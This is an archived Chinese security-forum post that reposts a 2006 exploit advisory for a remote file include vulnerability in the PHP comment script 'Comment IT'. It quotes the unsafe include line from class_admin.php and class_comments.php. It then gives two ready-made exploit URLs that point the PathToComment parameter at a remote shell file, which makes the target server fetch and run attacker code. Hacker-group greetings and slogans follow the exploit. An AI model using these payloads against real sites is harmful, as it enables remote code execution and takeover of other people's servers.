CommentIT (PathToComment) Remote File Include Vulnerabilities(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2006-10-25 23:06

CommentIT (PathToComment) Remote File Include Vulnerabilities

[code]
Comment IT  (class_admin.php , class_comments.php)  Remot File Include Vulnerability

Found By : CoLd Zero  [ Wasem898 ]

Palestine Muslim Hacker's

######################################################
#
#       [ Comment IT ]
#
# Class: File Include Vulnerability
# Published  2006-10-24
# Remote: Yes
# Critical  Level : Dangerous
# Site: [url]http://www.comscripts.com/scripts/php.comment-it.623.html[/url]
# Author: Cold Zero
# Contact:  [email]ip.123.456.78.90@hotmail.com[/email]
#
######################################################

file's ;

class_admin.php
class_comments.php
======================================================
Vuln Code

include_once ($PathToComment."/classes/class_db.php");

=======================================================

Exploit :

Http:// [url]www.Victem.0[/url] / [Comment IT_path] /classes/class_admin.php?PathToComment=http://ColdZero-Shell.txt

Http:// [url]www.Victem.0[/url] / [Comment IT_path] /classes/class_comments.php?PathToComment=http://ColdZero-Shell.txt

----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] ]organza[

---- GreeTz: All [url]www.4azhar.Com[/url] Members

Cont :  [email]ip.123.456.78.90@hotmail.com[/email]

--------------------------------------||  Viva Palestine ||-----------------------------------------

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

CommentIT (PathToComment) Remote File Include Vulnerabilities